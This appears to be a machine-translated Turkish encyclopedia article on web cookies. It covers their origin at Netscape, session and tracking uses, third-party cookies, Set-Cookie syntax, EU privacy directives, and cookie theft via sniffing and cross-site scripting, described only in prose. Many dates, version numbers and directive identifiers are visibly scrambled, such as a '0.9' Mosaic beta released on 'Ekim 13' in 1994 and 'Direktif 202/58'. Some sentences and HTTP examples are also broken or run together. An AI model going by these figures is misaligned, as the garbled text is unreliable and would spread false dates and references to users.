İnternet Çerezi: Nedir? Tanım, Kökenler, Türler ve Gizlilik

Un çerez veya web çerezi (ya da kurabiyeolarak kısaltılır şahit Quebec'te), HTTP iletişim protokolü tarafından bir HTTP sunucusu tarafından bir HTTP istemcisine gönderilen ve belirli koşullar altında aynı HTTP sunucusu her sorgulandığında istemcinin geri döndürdüğü bir bilgi dizisi olarak tanımlanır.

Tanımlama bilgisi şuna eşdeğerdir: terminalde saklanan küçük metin dosyası internet kullanıcısının. 20 yılı aşkın bir süredir mevcut olup, web sitesi geliştiricilerinin gezinmelerini kolaylaştırmak ve belirli işlevlere izin vermek için kullanıcı verilerini depolamasına izin verir. Çerezler, üçüncü şahıslar tarafından potansiyel olarak sömürülebilecek artık kişisel bilgiler içerdikleri için her zaman az çok tartışmalı olmuştur.

Web sunucusu tarafından, sunucuya her eriştiğinde değişmeden döndüren web tarayıcısına bir HTTP başlığı olarak gönderilir. Bir çerez şu amaçlarla kullanılabilir: kimlik doğrulama, bir oturum (durum bakımı) ve kullanıcı hakkında belirli bilgileri saklamaksite tercihleri ​​veya bir elektronik alışveriş sepetinin içeriği gibi. Çerez terimi şu kaynaktan türetilmiştir: sihirli kurabiye, tarayıcı tanımlama bilgileri fikrine ve adına ilham veren UNIX bilgi işleminde iyi bilinen bir kavramdır. Her biri kendi kullanımları, avantajları ve dezavantajları olan birkaç çerez alternatifi mevcuttur.

Basit metin dosyaları olan tanımlama bilgileri yürütülebilir değildir. Onlar değil ne casus yazılım ne de virüs, ancak bazı sitelerden gelen çerezler, kullanıcıların birden fazla siteyi ziyaret ettiklerinde izlenmesine izin verdiği için birçok anti-virüs yazılımı tarafından algılanır. 

Çoğu modern tarayıcı, kullanıcıların tanımlama bilgilerini kabul edip etmeyeceğinize karar verin. Kullanıcılar ayrıca çerezlerin ne kadar süreyle saklanacağını seçin. Ancak çerezlerin tamamen reddedilmesi bazı siteleri kullanılamaz hale getirir. Örneğin, alışveriş sepetlerini veya kimlik bilgilerini (kullanıcı adı ve şifre) kullanarak oturum açmayı gerektiren siteleri saklayın.

Tarihsel

Terim kurabiye İngilizce terimden türemiştir sihirli kurabiye, bir programın aldığı ve değişmeden geri döndürdüğü bir veri paketidir. Çerezler, ne zaman BT'de zaten kullanılıyordu? Lou Montulli onları web iletişiminde kullanma fikri vardı Haziran ayında 1994. O sırada, bir müşteri için e-ticaret uygulaması geliştiren Netscape Communications'ta çalışıyordu. Çerezler, bir mağazanın sanal alışveriş sepeti uygulamasının güvenilirliği sorununa bir çözüm getirdi.

John Giannandrea ve Lou Montulli, aynı yıl Netscape'in ilk çerez spesifikasyonunu yazdılar. 0.9 Ekim 13'te yayınlanan Mosaic Netscape'in 1994 beta sürümü entegre edildi çerez teknolojisi (gönderiye bakın). Çerezlerin ilk (deneysel olmayan) kullanımı, Netscape web sitesini ziyaret edenlerin siteyi daha önce ziyaret edip etmediğini belirlemek içindi. Montulli, 1995 yılında çerez teknolojisi için bir patent başvurusunda bulundu ve 5774670 numaralı ABD patenti alındı. 1998'de verildi.

0.9 yılında Netscape 1994 beta sürümünde uygulandıktan sonra, tanımlama bilgileri Ekim 2'te piyasaya sürülen Internet Explorer 1995'ye entegre edildi.

Tanımlama bilgilerinin tanıtımı henüz kamuoyu tarafından yaygın olarak bilinmemektedir. Özellikle, çerezler tarayıcı ayarlarında varsayılan olarak kabul edildi ve kullanıcılara bunların varlığından haberdar edilmedi. Bazı insanlar 1995'in ilk çeyreğinde çerezlerin varlığından haberdardı, ancak genel kamuoyu ancak Financial Times'ın 12 Şubat 1996'da bir makale yayınlamasının ardından çerezlerin varlığından haberdar oldu. Aynı yıl, çerezler medyanın büyük ilgisini çekti. olası gizlilik ihlalleri nedeniyle. Tanımlama bilgileri konusu, 1996 ve 1997 yıllarında Amerikan Federal Ticaret Komisyonu'nun iki istişaresinde tartışılmıştır.

Resmi tanımlama bilgisi spesifikasyonunun geliştirilmesi halihazırda devam etmekteydi. Resmi şartnamenin ilk tartışmaları Nisan 1995'te www-talk posta listesinde gerçekleşti. Özel bir IETF çalışma grubu oluşturuldu. Durumdan HTTP işlemlerine geçiş için iki alternatif teklif, sırasıyla Brian Behlendorf ve David Kristol tarafından önerildi, ancak bizzat Kristol liderliğindeki grup, Netscape'in belirtimini başlangıç ​​noktası olarak kullanmaya karar verdi. Şubat 1996'da çalışma grubu, üçüncü taraf tanımlama bilgilerinin mahremiyet için önemli bir tehdit oluşturduğunu belirledi. Grup tarafından üretilen spesifikasyon sonunda şu şekilde yayınlandı: RFC 2109.

2014 yılının sonundan itibaren birçok sitede çerezlerle ilgili bir afiş görüyoruz. izin veren en az bir tarayıcı uzantısı vardır. afiş görüntülenmiyor.

Çerez Türleri ve Kullanımları

Oturum yönetimi

Çerezler, kullanıcı verilerini gezinme sırasında ve aynı zamanda birden fazla ziyarette tutmak için kullanılabilir. Çerezler, kullanıcının sitede gezinirken satın almak istediği ürünleri biriktirebileceği sanal bir cihaz olan elektronik alışveriş sepetlerini uygulamanın bir yolunu sağlamak için tanıtıldı.

Bu günlerde, alışveriş sepetleri gibi uygulamalar bunun yerine öğelerin listesini bir sunucudaki bir veritabanında depolar, bu tercih edilir; onları tanımlama bilgisinin kendisine kaydetmektense. Web sunucusu, benzersiz bir oturum kimliği içeren bir tanımlama bilgisi gönderir. Web tarayıcısı daha sonra bu oturum kimliğini sonraki her istekte döndürür ve sepetteki öğeler kaydedilir ve bu aynı benzersiz oturum kimliğiyle ilişkilendirilir.

Çerezlerin sık kullanımı, kimlik bilgilerini kullanarak bir siteye giriş yapmak için yararlıdır. Kısacası, web sunucusu önce benzersiz bir oturum kimliği içeren bir tanımlama bilgisi gönderir. Ardından kullanıcılar kimlik bilgilerini (genellikle bir kullanıcı adı ve parola) sağlar. Web uygulaması daha sonra oturumun kimliğini doğrular ve kullanıcının hizmete erişmesine izin verir.

kişiselleştirme

Çerezler, gelecekte ona uygun içeriği göstermek için bir sitenin kullanıcısı hakkındaki bilgileri hatırlamak için kullanılabilir. Örneğin, bir web sunucusu, o web sitesinde oturum açmak için kullanılan son kullanıcı adını içeren bir tanımlama bilgisi gönderebilir, böylece kullanıcı adı gelecekteki ziyaretlerde önceden doldurulabilir.

Birçok web sitesi, kullanıcı tercihlerine göre kişiselleştirme için tanımlama bilgileri kullanır. Kullanıcılar tercihlerini bir formda seçer ve bunları sunucuya gönderir. Sunucu, tercihleri ​​bir tanımlama bilgisinde kodlar ve tarayıcıya geri gönderir. Daha sonra, kullanıcı bu sitenin bir sayfasına her eriştiğinde, tarayıcı çerezi ve dolayısıyla tercihler listesini döndürür; sunucu daha sonra sayfayı kullanıcının tercihlerine göre özelleştirebilir. Örneğin, Wikipedia web sitesi, kullanıcılarına tercih ettikleri site dış görünümünü seçme olanağı tanır. Google arama motoru, kullanıcılarına (kayıtlı olmasalar bile) her sonuç sayfasında görmek istedikleri sonuç sayısını seçme olanağı tanır.

İzleme

İzleme çerezleri, internet kullanıcılarının gezinme alışkanlıklarını izlemek için kullanılır. Bu kısmen, bir sayfa için istekte bulunan bilgisayarın IP adresini kullanarak veya müşterinin her istekle birlikte gönderdiği 'yönlendiren' HTTP üstbilgisini kullanarak da yapılabilir, ancak tanımlama bilgileri daha fazla kesinlik sağlar. Bu, aşağıdaki örnekteki gibi yapılabilir:

1. Kullanıcı bir sitedeki bir sayfayı çağırırsa ve istek çerez içermiyorsa, sunucu bunun kullanıcı tarafından ziyaret edilen ilk sayfa olduğunu varsayar. Sunucu daha sonra rasgele bir dize oluşturur ve onu istenen sayfayla birlikte tarayıcıya gönderir.
2. Bu andan itibaren, çerez, sitenin her yeni sayfası çağrıldığında tarayıcı tarafından otomatik olarak gönderilecektir. Sunucu, sayfayı her zamanki gibi gönderecek, ancak aynı zamanda çağrılan sayfanın URL'sini, isteğin tarihini, saatini ve çerezi bir günlük dosyasına kaydedecektir.

Günlük dosyasına bakılarak kullanıcının hangi sayfaları hangi sırayla ziyaret ettiği görülebilir. Örneğin, dosya id=abc tanımlama bilgisi kullanılarak yapılan birkaç istek içeriyorsa, bu, tüm bu isteklerin aynı kullanıcıdan geldiğini belirleyebilir. İstenen URL, isteklerle ilişkili tarih ve saat, kullanıcının gezinmesinin izlenmesini sağlar.

Aşağıda açıklanan üçüncü taraf tanımlama bilgileri ve web işaretçileri, ayrıca farklı siteler arasında izlemeyi mümkün kılar. Tek site izleme genellikle istatistiksel amaçlar için kullanılır. Buna karşılık, üçüncü taraf tanımlama bilgilerini kullanan farklı siteler arasında izleme, genellikle reklam şirketleri tarafından anonim kullanıcı profilleri oluşturmak için kullanılır (bu profiller daha sonra kullanıcıya hangi reklamların gösterilmesi gerektiğini belirlemek ve ona bu reklamlara karşılık gelen e-postaları göndermek için kullanılır - SPAM ).

İzleme tanımlama bilgileri, kullanıcı gizliliğini ihlal etme riski taşır ancak kolayca silinebilirler. Modern tarayıcıların çoğu, uygulamayı kapatırken kalıcı tanımlama bilgilerini otomatik olarak silme seçeneği içerir.

Üçüncü taraf tanımlama bilgileri

Bir web sayfasında yer alan resimler ve diğer nesneler, sayfayı barındıran sunucudan farklı sunucularda bulunabilir. Sayfayı görüntülemek için, tarayıcı tüm bu nesneleri indirir. Çoğu web sitesi farklı kaynaklardan bilgi içerir. Örneğin, tarayıcınıza www.example.com yazarsanız, sayfanın bir kısmında genellikle farklı kaynaklardan, yani www..example.com'dan farklı bir alan adından gelen nesneler veya reklamlar olacaktır. "Birinci" taraf tanımlama bilgileri, tarayıcının adres çubuğunda listelenen etki alanı tarafından ayarlanan tanımlama bilgileridir. Üçüncü taraf tanımlama bilgileri, farklı bir etki alanından gelen sayfa nesnelerinden biri tarafından ayarlanır.

Varsayılan olarak, Mozilla Firefox, Microsoft Internet Explorer ve Opera gibi tarayıcılar üçüncü taraf tanımlama bilgilerini kabul eder, ancak kullanıcılar bunları engellemek için tarayıcı seçeneklerindeki ayarları değiştirebilir. Web işlevselliğini etkinleştiren üçüncü taraf tanımlama bilgilerinin doğasında herhangi bir güvenlik riski yoktur, ancak bunlar aynı zamanda kullanıcıları izlemek için de kullanılır. siteden siteye.

Google Chrome dahil tüm tarayıcılarda kullanılabilen Ghostery gibi araçlar, üçüncü taraflar arasındaki alışverişi engelleyebilir.

uygulama

Çerezler, web sunucusu tarafından tarayıcıya gönderilen küçük veri parçalarıdır. Tarayıcı, durumu (geçmiş olayların hafızası) başka türlü durumsuz HTTP işlemine dahil ederek bunları değiştirmeden sunucuya döndürür. Tanımlama bilgileri olmadan, bir web sayfasının veya bir web sayfasının bir bileşeninin her alınması, aynı siteye yapılan diğer isteklerden bağımsız olarak izole edilmiş bir olaydır. Çerezler, web sunucusu tarafından ayarlanabilmenin yanı sıra, tarayıcı tarafından desteklenip yetkilendirildiği takdirde JavaScript gibi betik dilleri tarafından da ayarlanabilir.

Resmi tanımlama bilgisi özelliği, tarayıcıların minimum sayıda tanımlama bilgisi kaydedip yeniden gönderebilmesi gerektiğini önermektedir. Spesifik olarak, bir tarayıcı, her biri dört kilobaytlık en az 300 tanımlama bilgisi ve tek bir sunucu veya etki alanı için en az 20 tanımlama bilgisi depolayabilmelidir.

Bölüm 3.1'e göre RFC 2965, tanımlama bilgisi adları büyük/küçük harfe duyarlı değildir.

Bir tanımlama bilgisi, sona erme tarihini belirtebilir, bu durumda tanımlama bilgisi bu tarihte silinir. Çerez bir son kullanma tarihi belirtmezse, kullanıcı tarayıcısından çıkar çıkmaz çerez silinir. Bu nedenle, bir son kullanma tarihi belirtmek, çerezin birden çok oturumda hayatta kalmasını sağlamanın bir yoludur. Bu nedenle son kullanma tarihi olan çerezlerin kalıcı. Örnek bir uygulama: Bir perakende satış sitesi, kullanıcıların alışveriş sepetlerine koydukları ürünleri kaydetmek için kalıcı çerezler kullanabilir (gerçekte çerez, sizin bilgisayarınıza değil, satış sitesindeki bir veritabanına kaydedilen bir girişe atıfta bulunabilir) . Bu sayede kullanıcılar alışveriş yapmadan tarayıcıdan çıkıp daha sonra geri dönerlerse sepetteki ürünleri tekrar bulabilecekler. Bu çerezler bir son kullanma tarihi vermemişlerse, tarayıcı kapatıldığında geçerlilikleri sona erecek ve sepetin içeriğine ilişkin bilgiler kaybolacaktır.

Çerezlerin kapsamı, onları oluşturan sunucudaki belirli bir alan, alt alan veya yolla sınırlandırılabilir.

çerez oluşturma

Web sayfalarının aktarımı, Köprü Metni Aktarım Protokolü (HTTP) kullanılarak yapılır. Çerezleri yok sayan tarayıcılar, web sunucularından bir sayfayı genellikle onlara kısa bir metin göndererek çağırır. HTTP isteği. Örneğin, www.example.org/index.html sayfasına erişmek için tarayıcılar www.example.org sunucusuna bağlanır ve şuna benzer bir istek gönderir:

	GET /index.html HTTP/1.1Host: www.example.org
denizci	→	serveur

Sunucu, istenen sayfayı, öncesinde benzer bir metinle göndererek yanıt verir; tamamı çağrılır. HTTP yanıtı. Bu paket, tarayıcıya çerezleri saklaması talimatını veren satırlar içerebilir:

	HTTP/1.1 200 Tamamİçerik türü: metin/htmlÇerez Ayarla: ad=değer (HTML sayfası)
denizci	←	serveur

Sunucu, tarayıcının bir tanımlama bilgisi saklamasını istiyorsa, yalnızca Set-Cookie satırını gönderir. Set-Cookie, tarayıcının name=value dizesini depolaması ve sunucuya gelecekteki tüm isteklerde döndürmesi için bir istektir. Tarayıcı tanımlama bilgilerini destekliyorsa ve tarayıcı seçeneklerinde tanımlama bilgileri etkinleştirildiyse, tanımlama bilgisi aynı sunucuya yapılan sonraki tüm isteklere dahil edilecektir. Örneğin, tarayıcı www.example.org sunucusuna aşağıdaki isteği göndererek www.example.org/news.html sayfasını çağırır:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
denizci	→	serveur

Bu, aynı sunucudan başka bir sayfa için bir istektir ve sunucunun daha önce tarayıcıya gönderdiği bir dize içerdiğinden yukarıdaki ilkinden farklıdır. Bu sayede sunucu, bu isteğin bir önceki istekle bağlantılı olduğunu bilir. Sunucu, aranan sayfayı göndererek ve ayrıca ona başka çerezler ekleyerek yanıt verir.

Çerezin değeri, çağrılan sayfaya yanıt olarak yeni bir Set-Cookie: name=new_value satırı göndererek sunucu tarafından değiştirilebilir. Tarayıcı daha sonra eski değeri yenisiyle değiştirir.

Set-Cookie satırı, HTTP sunucusu tarafından değil, genellikle bir CGI programı veya başka bir betik dili tarafından oluşturulur. HTTP sunucusu (örnek: Apache), tarayıcıya yalnızca programın sonucunu (öncesinde çerezleri içeren bir başlık bulunan bir belge) iletir.

Çerezler, tarayıcıda, yani sunucu tarafında değil, istemci tarafında çalışan JavaScript veya diğer benzer diller tarafından da ayarlanabilir. JavaScript'te, bunun için document.cookie nesnesi kullanılır. Örneğin, document.cookie = "temperature=20" ifadesi, "temperature" adında ve 20 değerinde bir çerez oluşturur.

Bir çerezin özellikleri

Ad/değer çiftine ek olarak, bir tanımlama bilgisi ayrıca bir son kullanma tarihi, bir yol, bir alan adı ve amaçlanan bağlantı türünü, yani normal veya şifreli içerebilir. RFC 2965 ayrıca tanımlama bilgilerinin zorunlu bir sürüm numarasına sahip olması gerektiğini tanımlar, ancak bu genellikle atlanır. Bu veri bölümleri ad=yeni_değer çiftini takip eder ve noktalı virgülle ayrılır. Örneğin, sunucu tarafından bir Set-Cookie satırı gönderilerek bir çerez oluşturulabilir: name=new_value; sona eriyor=tarih; yol=/; etki alanı=.example.org.

Bir çerezin sona ermesi

Çerezlerin süresi dolar ve ardından aşağıdaki durumlarda tarayıcı tarafından sunucuya gönderilmez:

• Tarayıcı kapatıldığında, çerez kalıcı değilse.
• Çerez son kullanma tarihi geçtiğinde.
• Çerez son kullanma tarihi (sunucu veya komut dosyası tarafından) geçmişte bir tarihe değiştirildiğinde.
• Tarayıcı, kullanıcının isteği üzerine çerezi sildiğinde.

Üçüncü durum, sunucuların veya komut dosyalarının bir tanımlama bilgisini açıkça silmesine izin verir. Google Chrome web tarayıcısı ile içerik ayarlarına erişerek belirli bir çerezin son kullanma tarihini öğrenmenin mümkün olduğunu unutmayın. Bir bilgisayara kaydedilen bir tanımlama bilgisi, onu silmek için herhangi bir işlem yapılmazsa, birkaç on yıl orada kalabilir.

Stereotipler

İnternete girişlerinden bu yana, çerezlerle ilgili birçok fikir internette ve medyada dolaşıma girdi. 1998'de Amerika Birleşik Devletleri Enerji Bakanlığı bilgisayar olay izleme ekibi olan CIAC, çerez güvenlik açıklarının "aslında mevcut olmadığını" belirledi ve "ziyaretlerinizin kaynağı ve ziyaret ettiğiniz web sayfalarının ayrıntıları hakkında bilgi" olduğunu açıkladı. web sunucularının günlük dosyalarında zaten var”. 2005 yılında, Jupiter Research, ankete katılanların önemli bir yüzdesinin aşağıdaki ifadeleri dikkate aldığı bir çalışmanın sonuçlarını yayınladı:

• Çerezler gibi virüs, kullanıcıların sabit disklerine bulaşırlar.
• Çerezler oluşturur pop-up.
• Çerezler göndermek için kullanılır Spam.
• Çerezler sadece reklam amaçlı kullanılmaktadır.

Çerezler, kullanıcının bilgisayarındaki bilgileri silemez veya okuyamaz. Ancak tanımlama bilgileri, bir kullanıcının belirli bir sitede veya siteler grubunda ziyaret ettiği web sayfalarının tespit edilmesini mümkün kılar. Bu bilgiler, ciddi gizlilik sorunları oluşturabilecek şekilde kullanılabilecek veya üçüncü taraflara yeniden satılabilecek bir kullanıcı profilinde toplanabilir. Bazı profiller, hiçbir kişisel bilgi içermemeleri anlamında anonimdir, ancak bu tür profiller bile sorgulanabilir olabilir.

Aynı araştırmaya göre internet kullanıcılarının büyük bir yüzdesi çerezlerin nasıl silineceğini bilmemektedir. İnsanların tanımlama bilgilerine güvenmemelerinin nedenlerinden biri, bazı sitelerin tanımlama bilgilerinin kişisel tanımlama özelliğini kötüye kullanması ve bu bilgileri başka kaynaklarla paylaşmasıdır. İstenmeyen posta olarak kabul edilen hedefli reklamların ve istenmeyen e-postaların büyük bir yüzdesi, izleme çerezlerinden toplanan bilgilerden gelir.

Tarayıcı ayarları

Çoğu tarayıcı tanımlama bilgilerini destekler ve kullanıcının bunları devre dışı bırakmasına izin verir. En yaygın seçenekler şunlardır:

• Sürekli olarak kabul edilmeleri veya engellenmeleri için çerezleri tamamen etkinleştirin veya devre dışı bırakın.
• Tarayıcının adres çubuğuna javascript: alert(document.cookie) yazarak kullanıcının belirli bir sayfadaki etkin çerezleri görmesine izin verin. Bazı tarayıcılar, şu anda tarayıcı tarafından saklanan tanımlama bilgilerini görüntüleyebilen ve seçerek silebilen kullanıcı için bir tanımlama bilgisi yöneticisi içerir.

Çoğu tarayıcı, tanımlama bilgilerini içeren kişisel verilerin tamamen silinmesine de izin verir. Çerez izinlerini kontrol etmek için ek modüller de mevcuttur.

Gizlilik ve Üçüncü Taraf Çerezleri

Bu hayali örnekte, bir reklam şirketi iki web sitesine afiş yerleştirmiştir. Reklam şirketi, banner'ları kendi sunucularında barındırarak ve üçüncü taraf tanımlama bilgilerini kullanarak, kullanıcının bu iki sitedeki gezinmesini izleyebilir.

Tanımlama bilgilerinin, web kullanıcılarının gizliliği ve anonimliği için önemli etkileri vardır. Çerezler yalnızca onları ayarlayan sunucuya veya aynı İnternet etki alanına ait bir sunucuya geri gönderilse de, bir web sayfası, diğer etki alanlarına ait sunucularda depolanan resimler veya diğer bileşenler içerebilir. Bu harici bileşenlerin kurtarılması sırasında ayarlanan tanımlama bilgilerine denir üçüncü taraf tanımlama bilgileri. Bu, istenmeyen açılır pencerelerden gelen tanımlama bilgilerini içerir.

Reklam şirketleri, ziyaret ettikleri farklı sitelerdeki kullanıcıları izlemek için üçüncü taraf tanımlama bilgilerini kullanır. Özellikle, bir reklam şirketi bir kullanıcıyı, reklam görselleri veya izleme pikseli yerleştirdiği tüm sayfalarda izleyebilir. Kullanıcı tarafından ziyaret edilen sayfaların bilinmesi, reklam şirketinin kullanıcının reklam tercihlerini hedeflemesine olanak tanır.

Bir kullanıcı profili oluşturma yeteneği, özellikle üçüncü taraf tanımlama bilgileri kullanılarak farklı alanlarda izleme yapıldığında, bazıları tarafından gizliliğin ihlali olarak kabul edilir. Bu nedenle bazı ülkelerde çerez mevzuatı bulunmaktadır.

Amerika Birleşik Devletleri hükümeti, Beyaz Saray Uyuşturucu Politikası Ofisi'nin çevrimiçi uyuşturucu reklamlarını görüntüleyen kullanıcıların bilgisayarlarını izlemek için tanımlama bilgileri kullandığının ortaya çıkmasının ardından 2000 yılında tanımlama bilgilerinin yerleştirilmesi konusunda katı kurallar uygulamaya koydu. 2002'de gizlilik aktivisti Daniel Brandt, CIA'nın web sitelerini ziyaret eden bilgisayarlarda kalıcı çerezler bıraktığını keşfetti. Bu ihlalden haberdar edildikten sonra CIA, bu tanımlama bilgilerinin kasıtlı olarak gönderilmediğini beyan etti ve yerleştirmeyi durdurdu. 25 Aralık 2005'te Brandt, Ulusal Güvenlik Teşkilatı'nın (NSA) bir yazılım güncellemesi nedeniyle ziyaretçilerin bilgisayarlarına iki kalıcı çerez bıraktığını keşfetti. NSA, bilgilendirildikten sonra çerezleri hemen devre dışı bıraktı.

Birleşik Krallık'ta, Çerez yasası 25 Mayıs 2012 tarihinde yürürlüğe giren “Sitelerin niyetlerini beyan etmelerini zorunlu kılmakta, böylece kullanıcılara İnternet'teki geçişlerinde iz bırakmak isteyip istemediklerini seçme olanağı tanımaktadır. Böylece reklam hedeflemesinden korunabilirler. Fakat, göre Guardian, İnternet kullanıcılarının rızası mutlaka açık değildir; Kullanıcı onayı koşullarında değişiklikler yapıldı, bu hale getirildi böylece ima edilen.

Gizlilikle ilgili Direktif 2002/58

Direktif 202/58 gizlilik ve elektronik iletişim, çerezlerin kullanımına ilişkin kuralları içerir. Özellikle, bu direktifin 5. maddesinin 3. paragrafı, verilerin (çerezler gibi) kullanıcının bilgisayarında saklanmasının yalnızca aşağıdaki durumlarda yapılmasını gerektirir:

• kullanıcı, verilerin nasıl kullanıldığı konusunda bilgilendirilir;
• kullanıcıya bu depolama işlemini reddetme seçeneği sunulur. Ancak bu maddede ayrıca teknik nedenlerle verilerin saklanmasının bu Kanundan muaf olduğu belirtilmektedir.

Ancak, Aralık 2003 tarihli bir rapora göre, Ekim 2004'ten itibaren uygulanacağı için, direktif ancak çok kusurlu bir şekilde uygulamaya kondu; bu rapor, bazı Üye Devletlerin (Slovakya, Letonya, Yunanistan, Belçika ve Lüksemburg) Direktifi henüz iç hukuka aktarmadığına da işaret etti. iç hukuka direktif.

G29'un 2010 yılındaki görüşüne göre, özellikle davranışsal reklam amaçlı çerezlerin kullanımını İnternet kullanıcısının açık rızasına bağlayan bu yönerge çok zayıf bir şekilde uygulanmaya devam etmektedir. Aslında çoğu site, "teknik" çerez ayrımı yapmadan, kullanımlarına ilişkin bilgi vermeden "çerez" kullanımına ilişkin bilgi veren basit bir "banner" ile yetinerek, yönergeye uygun olmayan bir şekilde bunu yapmaktadır. "takip" çerezleri veya teknik çerezleri (alışveriş sepeti yönetim çerezleri gibi) korumak isteyen kullanıcıya gerçek bir seçenek sunma ve "izleme" çerezlerini reddetme. Aslında, 2002/58 direktifine veya 95/46 direktifine (kişisel verilerin korunması) uymayan tanımlama bilgileri reddedilirse birçok site düzgün çalışmaz.

Direktif 2009/136 / CE

Bu materyal, 2009 Kasım 136 tarihli 25/2009/EC sayılı Direktif ile güncellenmiştir ve "bir abonenin veya kullanıcının terminal ekipmanında bilgilerin depolanmasına veya önceden depolanmış bilgilere erişimin sağlanmasına yalnızca aşağıdaki koşullarla izin verilir: abone veya kullanıcı, 95/46/EC sayılı Direktife uygun olarak, işleme amaçları hakkında diğerleri arasında açık ve eksiksiz bilgi aldıktan sonra onay vermiştir”. Bu nedenle yeni direktif, internet kullanıcısının bilgisayarına tanımlama bilgilerinin yerleştirilmesinden önceki yükümlülükleri güçlendirmektedir.

Bununla birlikte, direktifin ön değerlendirmelerinde, Avrupa yasa koyucusu şunları belirtir: "95/46/EC sayılı Direktifin ilgili hükümlerine uygun olarak, teknik olarak mümkün ve etkili olduğu durumlarda, kullanıcının işlemeye ilişkin rızası, bir tarayıcının veya başka bir uygulamanın uygun ayarlarının kullanılması”. Ama aslında, bugüne kadar hiçbir tarayıcı, temel teknik tanımlama bilgilerini kullanıcının seçimine bırakılması gereken isteğe bağlı olanlardan ayırmayı mümkün kılmamıştır.

Bu yeni yönerge, Temmuz 2012'de Belçikalı milletvekilleri tarafından iç hukuka aktarıldı. 2014'te yapılan bir araştırma, milletvekillerinin bile uygulamak için mücadele ettiğini gösteriyor. yönergenin kısıtlamaları.

P3P

P3P spesifikasyonu, bir sunucunun ne tür bilgileri hangi amaçla topladığını tanımlayan bir gizlilik politikası belirtme yeteneğini içerir. Bu politikalar, çerezler kullanılarak toplanan bilgilerin kullanımını içerir (ancak bunlarla sınırlı değildir). P3P tanımlarına göre bir tarayıcı, gizlilik politikalarını kullanıcının tercihleri ​​ile karşılaştırarak veya kullanıcıya sunucu tarafından beyan edilen gizlilik politikası gizlilik bildirimini sunarak çerezleri kabul edebilir veya reddedebilir.

Apple Safari ve Microsoft Internet Explorer sürüm 6 ve 7 dahil olmak üzere pek çok tarayıcı, tarayıcının üçüncü taraf çerez depolamasını kabul edip etmeyeceğini belirlemesine izin veren P3P'yi destekler. Opera tarayıcı, kullanıcıların üçüncü taraf tanımlama bilgilerini reddetmesine ve İnternet etki alanları için genel ve özel bir güvenlik profili oluşturmasına olanak tanır. Mozilla Firefox sürüm 2, P3P desteğini bıraktı ancak sürüm 3'te eski haline getirdi.

Üçüncü taraf tanımlama bilgileri, kullanıcının web deneyimini olumsuz etkilemeden gizliliği artırmak ve reklam izlemeyi azaltmak için çoğu tarayıcı tarafından engellenebilir. Birçok reklam ajansı bir seçenek sunar vazgeçmek tarayıcıda bu hedeflemeyi devre dışı bırakan genel bir çerez ayarlayarak hedefli reklamcılığa, ancak böyle bir çözüm, buna saygı duyulduğunda pratik olarak etkili değildir, çünkü bu genel çerez, kullanıcı bu çerezleri sildiği anda silinir ve bu da tercihi iptal eder. karar çıktı.

Çerezlerin dezavantajları

Gizlilik sorunlarına ek olarak, çerezlerin bazı teknik sakıncaları da vardır. Özellikle, kullanıcıları her zaman doğru bir şekilde tanımlamazlar, çok sayıda olduklarında site performansını yavaşlatabilirler, güvenlik saldırıları için kullanılabilirler ve yazılımın temsili durum aktarımı, mimari tarzı ile çelişirler.

kesin olmayan tanımlama

Bir bilgisayarda birden fazla tarayıcı kullanılıyorsa her birinde çerezler için her zaman ayrı bir depolama birimi bulunur. Çerezler bu nedenle bir kişiyi değil, bir kullanıcı hesabı, bir bilgisayar ve bir web tarayıcısının birleşimini tanımlar. Böylece, çerezlerin tümüne sahip olan bu hesapları, bilgisayarları veya tarayıcıları herkes kullanabilir. Benzer şekilde çerezler, "internet kafeler" veya bilgisayar kaynaklarına ücretsiz erişim sağlayan herhangi bir yer gibi aynı kullanıcı hesabını, bilgisayarı ve tarayıcıyı paylaşan birden fazla kullanıcı arasında ayrım yapmaz.

Ancak pratikte bu ifadenin çoğu durumda yanıltıcı olduğu ortaya çıkıyor çünkü bugün "kişisel" bir bilgisayar (veya daha kötüsü bir akıllı telefon veya tablet) esas olarak tek bir kişi tarafından kullanılıyor. Bu, belirli bir kişiyi hedef almak ve Toplanan bilgi hacmi aracılığıyla, kişi "ismen" tanımlanmasa bile kişiselleştirilmiş hedeflemeye ulaşır.

Çerez hırsızlığı

Çerez, ağdaki başka bir bilgisayar tarafından çalınabilir.

Normal çalışma sırasında, çerezler sunucu (veya aynı etki alanındaki bir grup sunucu) ile kullanıcının bilgisayar tarayıcısı arasında geri gönderilir. Çerezler hassas bilgiler (kullanıcı adı, kimlik doğrulama için kullanılan bir şifre vb.) içerebileceğinden, değerlerine diğer bilgisayarlar tarafından erişilememesi gerekir. Çerez hırsızlığı, çerezlerin yetkisiz bir üçüncü şahıs tarafından ele geçirilmesi eylemidir.

Çerezler, oturum ele geçirme adı verilen bir saldırıda paket dinleyicisi aracılığıyla çalınabilir. Ağdaki trafik, gönderen ve alan bilgisayarlar dışındaki bilgisayarlar tarafından yakalanabilir ve okunabilir (özellikle şifrelenmemiş halka açık Wi-Fi alanında). Bu trafik, düz HTTP protokolü kullanılarak oturumlar üzerinden gönderilen tanımlama bilgilerini içerir. Ağ trafiği şifrelenmediğinde, kötü niyetli kullanıcılar "paket algılayıcıları" kullanarak ağdaki diğer kullanıcıların iletişimlerini okuyabilir.

Bu sorun, kullanıcının bilgisayarı ile sunucu arasındaki bağlantı HTTPS protokolü kullanılarak şifrelenerek aşılabilir. Bir sunucu belirtebilir güvenli bayrak çerez ayarlarken; tarayıcı bunu yalnızca SSL bağlantısı gibi güvenli bir hat üzerinden gönderir.

Bununla birlikte, birçok site, kullanıcı kimlik doğrulaması (yani oturum açma sayfası) için HTTPS şifreli iletişim kullanmasına rağmen, daha sonra verimlilik nedenleriyle şifrelenmemiş HTTP bağlantıları aracılığıyla oturum çerezlerini ve diğer verileri normal şekilde gönderir. Saldırganlar böylece diğer kullanıcıların çerezlerini engelleyebilir ve uygun sitelerde onların kimliğine bürünebilir veya çerez saldırılarında kullanabilir.

Sitede komut dosyası oluşturma: Yalnızca sunucu ile istemci arasında değiş tokuş edilmesi gereken bir çerez başka bir üçüncü tarafa gönderilir.

Çerezleri çalmanın başka bir yolu, sitelere komut dosyası yazmak ve tarayıcının çerezleri asla almayan kötü niyetli sunuculara göndermesini sağlamaktır. Modern tarayıcılar, aranan kod parçalarının sunucudan yürütülmesine izin verir. Çalışma zamanı sırasında çerezlere erişilirse, değerleri, bunlara erişmemesi gereken sunuculara bir şekilde iletilebilir. Tanımlama bilgilerini ağ üzerinden gönderilmeden önce şifrelemek, saldırıyı engellemeye yardımcı olmaz.

